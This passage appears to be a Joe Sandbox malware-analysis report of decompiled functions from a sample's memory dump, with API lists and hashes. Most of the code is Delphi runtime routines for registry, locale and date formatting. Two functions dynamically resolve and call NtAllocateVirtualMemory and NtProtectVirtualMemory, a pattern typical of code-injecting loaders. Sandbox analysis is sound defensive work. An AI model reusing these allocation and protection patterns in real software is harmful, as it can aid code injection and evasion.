                    • API ID: ArraySafe$BoundIndex$CopyCreateVariant
                    • String ID:
                    • API String ID: 351091851-0
                    • Opcode ID: 2c879650c84341011691a20226c27d6524aee0beb2559d3f6bcac5042424fc10
                    • Instruction ID: c5affe84f4f6a65560b125021cd6d2f067269f6a30cf76b6d99536202a50c600
                    • Opcode Fuzzy Hash: 2c879650c84341011691a20226c27d6524aee0beb2559d3f6bcac5042424fc10
                    • Instruction Fuzzy Hash: AF51DB79A1062D9FCB22DB98CD90BD9B3BCAF4D204F0541D5E609EB211D670AFC58F61
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 63%
                    			E0326355C() {
                    				void* _v8;
                    				char _v12;
                    				int _v16;
                    				signed short _t14;
                    				intOrPtr _t27;
                    				void* _t29;
                    				void* _t31;
                    				intOrPtr _t32;
                    
                    				_t29 = _t31;
                    				_t32 = _t31 + 0xfffffff4;
                    				_v12 =  *0x3289024 & 0x0000ffff;
                    				if(RegOpenKeyExA(0x80000002, "SOFTWARE\\Borland\\Delphi\\RTL", 0, 1,  &_v8) != 0) {
                    					_t14 =  *0x3289024 & 0xffc0 | _v12 & 0x3f;
                    					 *0x3289024 = _t14;
                    					return _t14;
                    				} else {
                    					_push(_t29);
                    					_push(E032635CD);
                    					_push( *[fs:eax]);
                    					 *[fs:eax] = _t32;
                    					_v16 = 4;
                    					RegQueryValueExA(_v8, "FPUMaskValue", 0, 0,  &_v12,  &_v16);
                    					_pop(_t27);
                    					 *[fs:eax] = _t27;
                    					_push(0x32635d4);
                    					return RegCloseKey(_v8);
                    				}
                    			}

                    APIs
                    • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 0326357E
                    • RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,032635CD,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 032635B1
                    • RegCloseKey.ADVAPI32(?,032635D4,00000000,?,00000004,00000000,032635CD,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 032635C7
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.761893695.0000000003261000.00000020.00001000.00020000.00000000.sdmp, Offset: 03260000, based on PE: true
                    • Associated: 00000000.00000002.761886979.0000000003260000.00000002.00001000.00020000.00000000.sdmp
                    • Associated: 00000000.00000002.761941452.0000000003289000.00000004.00001000.00020000.00000000.sdmp
                    • Associated: 00000000.00000002.761941452.0000000003393000.00000004.00001000.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3260000_r096teIe1H.jbxd
                    Similarity
                    • API ID: CloseOpenQueryValue
                    • String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
                    • API String ID: 3677997916-4173385793
                    • Opcode ID: 084f8adc9916032242907f0d18470e190abcff85399944a6c76ff94672bf51ae
                    • Instruction ID: 6f74c4ca8e50337aa1c823b668c48763a21716a947d3e712562ed94af79dac46
                    • Opcode Fuzzy Hash: 084f8adc9916032242907f0d18470e190abcff85399944a6c76ff94672bf51ae
                    • Instruction Fuzzy Hash: 6001B579A60318BEDB12DBD09D42BBDB3ECDF08700F104165BB10DB580E674A6D0D758
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 64%
                    			E0326AA34(void* __esi, void* __eflags) {
                    				char _v8;
                    				intOrPtr* _t18;
                    				intOrPtr _t26;
                    				void* _t27;
                    				long _t29;
                    				intOrPtr _t32;
                    				void* _t33;
                    
                    				_t33 = __eflags;
                    				_push(0);
                    				_push(_t32);
                    				_push(0x326aacb);
                    				_push( *[fs:eax]);
                    				 *[fs:eax] = _t32;
                    				E0326A7A8(GetThreadLocale(), 0x326aae0, 0x100b,  &_v8);
                    				_t29 = E03267AEC(0x326aae0, 1, _t33);
                    				if(_t29 + 0xfffffffd - 3 < 0) {
                    					EnumCalendarInfoA(E0326A980, GetThreadLocale(), _t29, 4);
                    					_t27 = 7;
                    					_t18 = 0x329d8f8;
                    					do {
                    						 *_t18 = 0xffffffff;
                    						_t18 = _t18 + 4;
                    						_t27 = _t27 - 1;
                    					} while (_t27 != 0);
                    					EnumCalendarInfoA(E0326A9BC, GetThreadLocale(), _t29, 3);
                    				}
                    				_pop(_t26);
                    				 *[fs:eax] = _t26;
                    				_push(E0326AAD2);
                    				return E032644A0( &_v8);
                    			}

                    APIs
                    • GetThreadLocale.KERNEL32(?,00000000,0326AACB,?,?,00000000), ref: 0326AA4C
                      • Part of subcall function 0326A7A8: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0326A7C6
                    • GetThreadLocale.KERNEL32(00000000,00000004,00000000,0326AACB,?,?,00000000), ref: 0326AA7C
                    • EnumCalendarInfoA.KERNEL32(Function_0000A980,00000000,00000000,00000004), ref: 0326AA87
                    • GetThreadLocale.KERNEL32(00000000,00000003,00000000,0326AACB,?,?,00000000), ref: 0326AAA5
                    • EnumCalendarInfoA.KERNEL32(Function_0000A9BC,00000000,00000000,00000003), ref: 0326AAB0
                    Memory Dump Source
                    • Source File: 00000000.00000002.761893695.0000000003261000.00000020.00001000.00020000.00000000.sdmp, Offset: 03260000, based on PE: true
                    • Associated: 00000000.00000002.761886979.0000000003260000.00000002.00001000.00020000.00000000.sdmp
                    • Associated: 00000000.00000002.761941452.0000000003289000.00000004.00001000.00020000.00000000.sdmp
                    • Associated: 00000000.00000002.761941452.0000000003393000.00000004.00001000.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3260000_r096teIe1H.jbxd
                    Similarity
                    • API ID: Locale$InfoThread$CalendarEnum
                    • String ID:
                    • API String ID: 4102113445-0
                    • Opcode ID: 6b05729024cfa053ac32d3424cd081ba054abc71f10cfb7ff48a99150432493a
                    • Instruction ID: 8c47bc5322d371f2907f8868689880fc5718e710d2287d740887252ae2546bae
                    • Opcode Fuzzy Hash: 6b05729024cfa053ac32d3424cd081ba054abc71f10cfb7ff48a99150432493a
                    • Instruction Fuzzy Hash: 8501F7B96213446FE301EA749D12B5F716CDF45620F510561E410BA6C0EAA49EC042E4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 81%
                    			E0326AAE4(void* __eax, void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                    				intOrPtr _v8;
                    				char _v12;
                    				intOrPtr _v16;
                    				char _v20;
                    				char _v24;
                    				void* _t45;
                    				void* _t47;
                    				void* _t49;
                    				void* _t51;
                    				intOrPtr _t75;
                    				void* _t76;
                    				void* _t77;
                    				void* _t83;
                    				void* _t92;
                    				intOrPtr _t111;
                    				void* _t122;
                    				void* _t124;
                    				intOrPtr _t127;
                    				void* _t128;
                    
                    				_t128 = __eflags;
                    				_push(0);
                    				_push(0);
                    				_push(0);
                    				_push(0);
                    				_push(0);
                    				_t122 = __edx;
                    				_t124 = __eax;
                    				_push(_t127);
                    				_push(0x326acb4);
                    				_push( *[fs:eax]);
                    				 *[fs:eax] = _t127;
                    				_t92 = 1;
                    				E032644A0(__edx);
                    				E0326A7A8(GetThreadLocale(), 0x326accc, 0x1009,  &_v12);
                    				if(E03267AEC(0x326accc, 1, _t128) + 0xfffffffd - 3 < 0) {
                    					while(1) {
                    						__eflags = _t92 - E03264760(_t124);
                    						if(__eflags > 0) {
                    							goto L28;
                    						}
                    						asm("bt [0x3289808], eax");
                    						if(__eflags >= 0) {
                    							_t45 = E032680A4(_t124 + _t92 - 1, 2, 0x326acd0);
                    							__eflags = _t45;
                    							if(_t45 != 0) {
                    								_t47 = E032680A4(_t124 + _t92 - 1, 4, 0x326ace0);
                    								__eflags = _t47;
                    								if(_t47 != 0) {
                    									_t49 = E032680A4(_t124 + _t92 - 1, 2, 0x326acf8);
                    									__eflags = _t49;
                    									if(_t49 != 0) {
                    										_t51 = ( *(_t124 + _t92 - 1) & 0x000000ff) - 0x59;
                    										__eflags = _t51;
                    										if(_t51 == 0) {
                    											L24:
                    											E0326476C(_t122, 0x326ad10);
                    										} else {
                    											__eflags = _t51 != 0x20;
                    											if(_t51 != 0x20) {
                    												E03264688();
                    												E0326476C(_t122, _v24);
                    											} else {
                    												goto L24;
                    											}
                    										}
                    									} else {
                    										E0326476C(_t122, 0x326ad04);
                    										_t92 = _t92 + 1;
                    									}
                    								} else {
                    									E0326476C(_t122, 0x326acf0);
                    									_t92 = _t92 + 3;
                    								}
                    							} else {
                    								E0326476C(_t122, 0x326acdc);
                    								_t92 = _t92 + 1;
                    							}
                    							_t92 = _t92 + 1;
                    							__eflags = _t92;
                    						} else {
                    							_v8 = E0326BAC8(_t124, _t92);
                    							E032649C4(_t124, _v8, _t92,  &_v20);
                    							E0326476C(_t122, _v20);
                    							_t92 = _t92 + _v8;
                    						}
                    					}
                    				} else {
                    					_t75 =  *0x329d8d0; // 0x9
                    					_t76 = _t75 - 4;
                    					if(_t76 == 0 || _t76 + 0xfffffff3 - 2 < 0) {
                    						_t77 = 1;
                    					} else {
                    						_t77 = 0;
                    					}
                    					if(_t77 == 0) {
                    						E032644F4(_t122, _t124);
                    					} else {
                    						while(_t92 <= E03264760(_t124)) {
                    							_t83 = ( *(_t124 + _t92 - 1) & 0x000000ff) - 0x47;
                    							__eflags = _t83;
                    							if(_t83 != 0) {
                    								__eflags = _t83 != 0x20;
                    								if(_t83 != 0x20) {
                    									E03264688();
                    									E0326476C(_t122, _v16);
                    								}
                    							}
                    							_t92 = _t92 + 1;
                    							__eflags = _t92;
                    						}
                    					}
                    				}
                    				L28:
                    				_pop(_t111);
                    				 *[fs:eax] = _t111;
                    				_push(E0326ACBB);
                    				return E032644C4( &_v24, 4);
                    			}























                    APIs
                    • GetThreadLocale.KERNEL32(?,00000000,0326ACB4,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 0326AB13
                      • Part of subcall function 0326A7A8: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0326A7C6
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.761893695.0000000003261000.00000020.00001000.00020000.00000000.sdmp, Offset: 03260000, based on PE: true
                    • Associated: 00000000.00000002.761886979.0000000003260000.00000002.00001000.00020000.00000000.sdmp
                    • Associated: 00000000.00000002.761941452.0000000003289000.00000004.00001000.00020000.00000000.sdmp
                    • Associated: 00000000.00000002.761941452.0000000003393000.00000004.00001000.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3260000_r096teIe1H.jbxd
                    Similarity
                    • API ID: Locale$InfoThread
                    • String ID: eeee$ggg$yyyy
                    • API String ID: 4232894706-1253427255
                    • Opcode ID: ebc7ef4bb9dc09e699e41af8fdf0ecd269526f72ccd02b7d02538e4118eb30e9
                    • Instruction ID: 2e42b41eb0b2eba4c1601090b1510b91b085942c7ac5a35673ca3c14da72418b
                    • Opcode Fuzzy Hash: ebc7ef4bb9dc09e699e41af8fdf0ecd269526f72ccd02b7d02538e4118eb30e9
                    • Instruction Fuzzy Hash: 6B4125B87342058FC712FBBE898027EF3DBEF86100B644466D481EB344DAB5DDC28661
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 58%
                    			E032779BC(intOrPtr _a4, char _a8, char _a12, intOrPtr _a16, intOrPtr _a20) {
                    
                    				 *0x329e318 = GetProcAddress(GetModuleHandleW(L"C:\\Windows\\System32\\ntdll.dll"), "NtAllocateVirtualMemory");
                    				 *0x329e318(_a4,  &_a8, 0,  &_a12, _a16, _a20);
                    				return _a8;
                    			}




                    APIs
                    • GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtAllocateVirtualMemory), ref: 032779C9
                    • GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 032779CF
                    Strings
                    • NtAllocateVirtualMemory, xrefs: 032779BF
                    • C:\Windows\System32\ntdll.dll, xrefs: 032779C4
                    Memory Dump Source
                    • Source File: 00000000.00000002.761893695.0000000003261000.00000020.00001000.00020000.00000000.sdmp, Offset: 03260000, based on PE: true
                    • Associated: 00000000.00000002.761886979.0000000003260000.00000002.00001000.00020000.00000000.sdmp
                    • Associated: 00000000.00000002.761941452.0000000003289000.00000004.00001000.00020000.00000000.sdmp
                    • Associated: 00000000.00000002.761941452.0000000003393000.00000004.00001000.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3260000_r096teIe1H.jbxd
                    Similarity
                    • API ID: AddressHandleModuleProc
                    • String ID: C:\Windows\System32\ntdll.dll$NtAllocateVirtualMemory
                    • API String ID: 1646373207-2206134580
                    • Opcode ID: 0b2c93b135c0715d558a49c65ba92ba1a84bd3cbcb4ef4967fe15d623d72c9eb
                    • Instruction ID: 6c072f61195a41f98d289380d62a041ead18b41dcdac6ef065948beb22e9274c
                    • Opcode Fuzzy Hash: 0b2c93b135c0715d558a49c65ba92ba1a84bd3cbcb4ef4967fe15d623d72c9eb
                    • Instruction Fuzzy Hash: FCE0BFB665030DBFDB00EF98EC45EEF37ACAB0D610F408516BA14DB101D674E5908BB5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 58%
                    			E03277A50(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                    
                    				 *0x329e31c = GetProcAddress(GetModuleHandleW(L"C:\\Windows\\System32\\ntdll.dll"), "NtProtectVirtualMemory");
                    				 *0x329e31c(_a4, _a8, _a12, _a16, _a20);
                    				return 1;
                    			}




                    APIs
                    • GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtProtectVirtualMemory), ref: 03277A5D
                    • GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 03277A63
                    Strings
                    • NtProtectVirtualMemory, xrefs: 03277A53
                    • C:\Windows\System32\ntdll.dll, xrefs: 03277A58
                    Memory Dump Source
                    • Source File: 00000000.00000002.761893695.0000000003261000.00000020.00001000.00020000.00000000.sdmp, Offset: 03260000, based on PE: true
                    • Associated: 00000000.00000002.761886979.0000000003260000.00000002.00001000.00020000.00000000.sdmp
                    • Associated: 00000000.00000002.761941452.0000000003289000.00000004.00001000.00020000.00000000.sdmp
                    • Associated: 00000000.00000002.761941452.0000000003393000.00000004.00001000.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3260000_r096teIe1H.jbxd
                    Similarity
                    • API ID: AddressHandleModuleProc
                    • String ID: C:\Windows\System32\ntdll.dll$NtProtectVirtualMemory
                    • API String ID: 1646373207-1386159242
                    • Opcode ID: b1ab73731cc6bd0f64524265252ad35f40e720adf86be432b8f98a61bcdd1c11
                    • Instruction ID: 083e02497de710916d614da332befbe2e2e7de9b1473c601aafa837fe6974888
                    • Opcode Fuzzy Hash: b1ab73731cc6bd0f64524265252ad35f40e720adf86be432b8f98a61bcdd1c11
                    • Instruction Fuzzy Hash: 9AE0E6B56103097FC740EFACF885D9F37DCAB0C640B008015B918D7201C675E5918F75
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E0326C458() {
                    				_Unknown_base(*)()* _t1;
                    				struct HINSTANCE__* _t3;
                    
                    				_t1 = GetModuleHandleA("kernel32.dll");
                    				_t3 = _t1;
                    				if(_t3 != 0) {
                    					_t1 = GetProcAddress(_t3, "GetDiskFreeSpaceExA");
                    					 *0x328982c = _t1;
                    				}
                    				if( *0x328982c == 0) {
                    					 *0x328982c = E03267FB8;
                    					return E03267FB8;
                    				}
                    				return _t1;
                    			}






                    APIs
                    • GetModuleHandleA.KERNEL32(kernel32.dll,?,0328810B,00000000,0328811E), ref: 0326C45E
                    • GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA), ref: 0326C46F
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.761893695.0000000003261000.00000020.00001000.00020000.00000000.sdmp, Offset: 03260000, based on PE: true
                    • Associated: 00000000.00000002.761886979.0000000003260000.00000002.00001000.00020000.00000000.sdmp
                    • Associated: 00000000.00000002.761941452.0000000003289000.00000004.00001000.00020000.00000000.sdmp
                    • Associated: 00000000.00000002.761941452.0000000003393000.00000004.00001000.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3260000_r096teIe1H.jbxd
                    Similarity
                    • API ID: AddressHandleModuleProc
                    • String ID: GetDiskFreeSpaceExA$kernel32.dll
                    • API String ID: 1646373207-3712701948
                    • Opcode ID: 908fe0b0d887db900d4ba9d6ad278e42ac8d31cac10b3aa2eb2192bdff6c7d68
                    • Instruction ID: ac7c145729af43a3488b39baeda055bc4d8769eb8d33a3b935e205f347b55d24
                    • Opcode Fuzzy Hash: 908fe0b0d887db900d4ba9d6ad278e42ac8d31cac10b3aa2eb2192bdff6c7d68
                    • Instruction Fuzzy Hash: 34D0C7746223675FDB10FBF57C85A3921D89F09718F44C4A5E1529A105D7B58CC04FE4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 98%
                    			E03269AD0(void* __ecx, void* __edx, signed char** __edi) {
                    				signed int _t147;
                    				signed int _t149;
                    				signed int _t151;
                    				signed int _t153;
                    				void* _t171;
                    				intOrPtr _t212;
                    				intOrPtr _t215;
                    				signed char _t220;
                    				intOrPtr _t258;
                    				signed char** _t261;
                    				signed int _t263;
                    				void* _t264;
                    				void* _t265;
                    
                    				L0:
                    				while(1) {
                    					L0:
                    					_t261 = __edi;
                    					E03269314(_t264);
                    					_t263 =  *__edi - 1;
                    					_t265 = E032680A4(_t263, 5, 0x3269d7c);
                    					if(_t265 != 0) {
                    						_t147 = E032680A4(_t263, 3, 0x3269d84);
                    						__eflags = _t147;
                    						if(_t147 != 0) {
                    							_t149 = E032680A4(_t263, 4, 0x3269d88);
                    							__eflags = _t149;
                    							if(_t149 != 0) {
                    								_t151 = E032680A4(_t263, 4, 0x3269d90);
                    								__eflags = _t151;
                    								if(_t151 != 0) {
                    									_t153 = E032680A4(_t263, 3, 0x3269d98);
                    									__eflags = _t153;
                    									if(_t153 != 0) {
                    										E03269204(1,  *((intOrPtr*)(_t264 + 8)));
                    									} else {
                    										E032692DC(_t264);
                    										E03269248( *((intOrPtr*)(0x329d890 + (E032691C8(__eflags,  *((intOrPtr*)( *((intOrPtr*)(_t264 + 8)) + 8)),  *((intOrPtr*)( *((intOrPtr*)(_t264 + 8)) + 0xc))) & 0x0000ffff) * 4)),  *((intOrPtr*)(_t264 + 8)));
                    										 *__edi =  &(( *__edi)[2]);
                    									}
                    								} else {
                    									E032692DC(_t264);
                    									E03269248( *((intOrPtr*)(0x329d8ac + (E032691C8(__eflags,  *((intOrPtr*)( *((intOrPtr*)(_t264 + 8)) + 8)),  *((intOrPtr*)( *((intOrPtr*)(_t264 + 8)) + 0xc))) & 0x0000ffff) * 4)),  *((intOrPtr*)(_t264 + 8)));
                    									 *__edi =  &(( *__edi)[3]);
                    								}
                    							} else {
                    								__eflags =  *((short*)(_t264 - 0x16)) - 0xc;
                    								if( *((short*)(_t264 - 0x16)) >= 0xc) {
                    									_t212 =  *0x329d828; // 0x92f1b68
                    									E03269248(_t212,  *((intOrPtr*)(_t264 + 8)));
                    								} else {
                    									_t215 =  *0x329d824; // 0x92f1b58
                    									E03269248(_t215,  *((intOrPtr*)(_t264 + 8)));
                    								}
                    								 *_t261 =  &(( *_t261)[3]);
                    								 *((char*)(_t264 - 0x1f)) = 1;
                    							}
                    						} else {
                    							__eflags =  *((short*)(_t264 - 0x16)) - 0xc;
                    							if( *((short*)(_t264 - 0x16)) >= 0xc) {
                    								__eflags = _t263;
                    							}
                    							E03269204(1,  *((intOrPtr*)(_t264 + 8)));
                    							 *_t261 =  &(( *_t261)[2]);
                    							 *((char*)(_t264 - 0x1f)) = 1;
                    						}
                    					} else {
                    						__eflags =  *(__ebp - 0x16) - 0xc;
                    						if( *(__ebp - 0x16) >= 0xc) {
                    							__esi = __esi + 3;
                    							__eflags = __esi;
                    						}
                    						__eax =  *(__ebp + 8);
                    						__edx = 2;
                    						__eax = __esi;
                    						__eax = E03269204(2,  *(__ebp + 8));
                    						 *__edi =  *__edi + 4;
                    						 *((char*)(__ebp - 0x1f)) = 1;
                    					}
                    					L109:
                    					while( *( *_t261) != 0) {
                    						 *(_t264 - 5) =  *( *_t261) & 0x000000ff;
                    						asm("bt [0x3289808], eax");
                    						if(_t265 >= 0) {
                    							 *_t261 = E0326BAC0( *_t261);
                    							_t220 =  *(_t264 - 5) & 0x000000ff;
                    							__eflags = _t220 + 0x9f - 0x1a;
                    							if(_t220 + 0x9f - 0x1a < 0) {
                    								_t220 = _t220 - 0x20;
                    								__eflags = _t220;
                    							}
                    							L5:
                    							__eflags = _t220 + 0xbf - 0x1a;
                    							if(_t220 + 0xbf - 0x1a >= 0) {
                    								L10:
                    								_t171 = (_t220 & 0x000000ff) + 0xffffffde;
                    								__eflags = _t171 - 0x38;
                    								if(_t171 > 0x38) {
                    									L108:
                    									E03269204(1,  *((intOrPtr*)(_t264 + 8)));
                    									continue;
                    								}
                    								L11:
                    								switch( *((intOrPtr*)(( *(_t171 + 0x32696d0) & 0x000000ff) * 4 +  &M03269709))) {
                    									case 0:
                    										goto L108;
                    									case 1:
                    										L12:
                    										E032692B0(_t264);
                    										E032692DC(_t264);
                    										__eflags =  *((intOrPtr*)(_t264 - 0xc)) - 2;
                    										if( *((intOrPtr*)(_t264 - 0xc)) > 2) {
                    											E03269264( *(_t264 - 0xe) & 0x0000ffff, 4, _t269,  *((intOrPtr*)(_t264 + 8)));
                    										} else {
                    											E03269264(( *(_t264 - 0xe) & 0x0000ffff) % 0x64, 2, _t269,  *((intOrPtr*)(_t264 + 8)));
                    										}
                    										goto L109;
                    									case 2:
                    										L15:
                    										E032692B0(__ebp) = E032692DC(__ebp);
                    										__eax =  *(__ebp + 8);
                    										__edx = __ebp - 0x28;
                    										 *(__ebp - 0xc) = E03269354( *(__ebp - 0xc), __ebx, __ebp - 0x28, __esi, __ebp);
                    										__eax =  *(__ebp - 0x28);
                    										__eax = E03269248( *(__ebp - 0x28),  *(__ebp + 8));
                    										goto L109;
                    									case 3:
                    										L16:
                    										E032692B0(__ebp) = E032692DC(__ebp);
                    										__eax =  *(__ebp + 8);
                    										__edx = __ebp - 0x2c;
                    										 *(__ebp - 0xc) = E032694D0( *(__ebp - 0xc), __ebx, __ebp - 0x2c, __esi, __ebp);
                    										__eax =  *(__ebp - 0x2c);
                    										__eax = E03269248( *(__ebp - 0x2c),  *(__ebp + 8));
                    										goto L109;
                    									case 4:
                    										L17:
                    										E032692B0(__ebp) = E032692DC(__ebp);
                    										 *(__ebp - 0xc) =  *(__ebp - 0xc) - 1;
                    										__eax =  *(__ebp - 0xc) - 0xffffffffffffffff;
                    										__eflags =  *(__ebp - 0xc) - 0xffffffffffffffff;
                    										if(__eflags < 0) {
                    											__eax =  *(__ebp + 8);
                    											__eax =  *(__ebp - 0x10) & 0x0000ffff;
                    											__edx =  *(__ebp - 0xc);
                    											__eax = E03269264( *(__ebp - 0x10) & 0x0000ffff, __edx, __fp0,  *(__ebp + 8));
                    										} else {
                    											if(__eflags == 0) {
                    												 *(__ebp + 8) =  *(__ebp - 0x10) & 0x0000ffff;
                    												__eax = 0x329d830[ *(__ebp - 0x10) & 0x0000ffff];
                    												__eax = E03269248(0x329d830[ *(__ebp - 0x10) & 0x0000ffff],  *(__ebp + 8));
                    											} else {
                    												 *(__ebp + 8) =  *(__ebp - 0x10) & 0x0000ffff;
                    												__eax =  *(0x329d860 + ( *(__ebp - 0x10) & 0x0000ffff) * 4);
                    												__eax = E03269248( *(0x329d860 + ( *(__ebp - 0x10) & 0x0000ffff) * 4),  *(__ebp + 8));
                    											}
                    										}
                    										goto L109;
                    									case 5:
                    										L23:
                    										E032692B0(__ebp) =  *(__ebp - 0xc);
                    										__eax =  *(__ebp - 0xc) - 1;
                    										__eax =  *(__ebp - 0xc) - 0xffffffffffffffff;
                    										__eflags = __eax;
                    										if(__eflags < 0) {
                    											E032692DC(__ebp) =  *(__ebp + 8);
                    											__eax =  *(__ebp - 0x12) & 0x0000ffff;
                    											__edx =  *(__ebp - 0xc);
                    											__eax = E03269264( *(__ebp - 0x12) & 0x0000ffff, __edx, __fp0,  *(__ebp + 8));
                    										} else {
                    											if(__eflags == 0) {
                    												E032691C8(__eflags,  *((intOrPtr*)( *(__ebp + 8) + 8)),  *((intOrPtr*)( *(__ebp + 8) + 0xc))) = __ax & 0x0000ffff;
                    												__eax =  *(0x329d890 + (__ax & 0x0000ffff) * 4);
                    												__eax = E03269248( *(0x329d890 + (__ax & 0x0000ffff) * 4),  *(__ebp + 8));
                    											} else {
                    												__eax = __eax - 1;
                    												__eflags = __eax;
                    												if(__eflags == 0) {
                    													E032691C8(__eflags,  *((intOrPtr*)( *(__ebp + 8) + 8)),  *((intOrPtr*)( *(__ebp + 8) + 0xc))) = __ax & 0x0000ffff;
                    													__eax =  *(0x329d8ac + (__ax & 0x0000ffff) * 4);
                    													__eax = E03269248( *(0x329d8ac + (__ax & 0x0000ffff) * 4),  *(__ebp + 8));
                    												} else {
                    													__eax = __eax - 1;
                    													__eflags = __eax;
                    													if(__eax == 0) {
                    														__eax =  *(__ebp + 8);
                    														__eax =  *0x329d818; // 0x92f8ed8
                    														__eax = E032695E8(__eax, __ebx, __edi, __esi,  *(__ebp + 8));
                    													} else {
                    														__eax =  *(__ebp + 8);
                    														__eax =  *0x329d81c; // 0x92ea698
                    														__eax = E032695E8(__eax, __ebx, __edi, __esi,  *(__ebp + 8));
                    													}
                    												}
                    											}
                    										}
                    										goto L109;
                    									case 6:
                    										L33:
                    										E032692B0(__ebp) = E03269314(__ebp);
                    										 *(__ebp - 0x20) = 0;
                    										__esi =  *__edi;
                    										while(1) {
                    											L52:
                    											__eflags =  *__esi;
                    											if(__eflags == 0) {
                    												break;
                    											}
                    											L34:
                    											 *__esi & 0x000000ff = __al & 0x000000ff;
                    											asm("bt [0x3289808], eax");
                    											if(__eflags >= 0) {
                    												L36:
                    												__eax =  *__esi & 0x000000ff;
                    												__eflags = __eax - 0x48;
                    												if(__eflags > 0) {
                    													L42:
                    													__eax = __eax - 0x61;
                    													__eflags = __eax;
                    													if(__eax == 0) {
                    														L45:
                    														__eflags =  *(__ebp - 0x20);
                    														if( *(__ebp - 0x20) != 0) {
                    															L51:
                    															__esi = __esi + 1;
                    															__eflags = __esi;
                    															continue;
                    														}
                    														L46:
                    														__edx = 0x3269d7c;
                    														__ecx = 5;
                    														__eax = __esi;
                    														__eax = E032680A4(__esi, 5, 0x3269d7c);
                    														__eflags = __eax;
                    														if(__eax == 0) {
                    															L49:
                    															 *((char*)(__ebp - 0x1f)) = 1;
                    															break;
                    														}
                    														L47:
                    														__edx = 0x3269d84;
                    														__ecx = 3;
                    														__eax = __esi;
                    														__eax = E032680A4(__esi, 3, 0x3269d84);
                    														__eflags = __eax;
                    														if(__eax == 0) {
                    															goto L49;
                    														}
                    														L48:
                    														__edx = 0x3269d88;
                    														__ecx = 4;
                    														__eax = __esi;
                    														__eax = E032680A4(__esi, 4, 0x3269d88);
                    														__eflags = __eax;
                    														if(__eax != 0) {
                    															break;
                    														}
                    														goto L49;
                    													}
                    													L43:
                    													__eax = __eax - 7;
                    													__eflags = __eax;
                    													if(__eax == 0) {
                    														break;
                    													}
                    													L44:
                    													goto L51;
                    												}
                    												L37:
                    												if(__eflags == 0) {
                    													break;
                    												}
                    												L38:
                    												__eax = __eax - 0x22;
                    												__eflags = __eax;
                    												if(__eax == 0) {
                    													L50:
                    													__eax =  *(__ebp - 0x20) & 0x000000ff;
                    													__al = __al ^ 0x00000001;
                    													__eflags = __al;
                    													 *(__ebp - 0x20) = __al;
                    													goto L51;
                    												}
                    												L39:
                    												__eax = __eax - 5;
                    												__eflags = __eax;
                    												if(__eax == 0) {
                    													goto L50;
                    												}
                    												L40:
                    												__eax = __eax - 0x1a;
                    												__eflags = __eax;
                    												if(__eax == 0) {
                    													goto L45;
                    												}
                    												L41:
                    												goto L51;
                    											} else {
                    												__eax = __esi;
                    												__esi = E0326BAC0(__esi);
                    												continue;
                    											}
                    										}
                    										L53:
                    										__eax =  *(__ebp - 0x16) & 0x0000ffff;
                    										 *(__ebp - 0x22) = __ax;
                    										__eflags =  *((char*)(__ebp - 0x1f));
                    										if( *((char*)(__ebp - 0x1f)) != 0) {
                    											__eflags =  *(__ebp - 0x22);
                    											if( *(__ebp - 0x22) != 0) {
                    												__eflags =  *(__ebp - 0x22) - 0xc;
                    												if( *(__ebp - 0x22) > 0xc) {
                    													_t69 = __ebp - 0x22;
                    													 *_t69 =  *(__ebp - 0x22) - 0xc;
                    													__eflags =  *_t69;
                    												}
                    											} else {
                    												 *(__ebp - 0x22) = 0xc;
                    											}
                    										}
                    										__eflags =  *(__ebp - 0xc) - 2;
                    										if( *(__ebp - 0xc) > 2) {
                    											 *(__ebp - 0xc) = 2;
                    										}
                    										__eax =  *(__ebp + 8);
                    										__eax =  *(__ebp - 0x22) & 0x0000ffff;
                    										__edx =  *(__ebp - 0xc);
                    										__eax = E03269264( *(__ebp - 0x22) & 0x0000ffff, __edx, __fp0,  *(__ebp + 8));
                    										goto L109;
                    									case 7:
                    										L61:
                    										E032692B0(__ebp) = E03269314(__ebp);
                    										__eflags =  *(__ebp - 0xc) - 2;
                    										if( *(__ebp - 0xc) > 2) {
                    											 *(__ebp - 0xc) = 2;
                    										}
                    										__eax =  *(__ebp + 8);
                    										__eax =  *(__ebp - 0x18) & 0x0000ffff;
                    										__edx =  *(__ebp - 0xc);
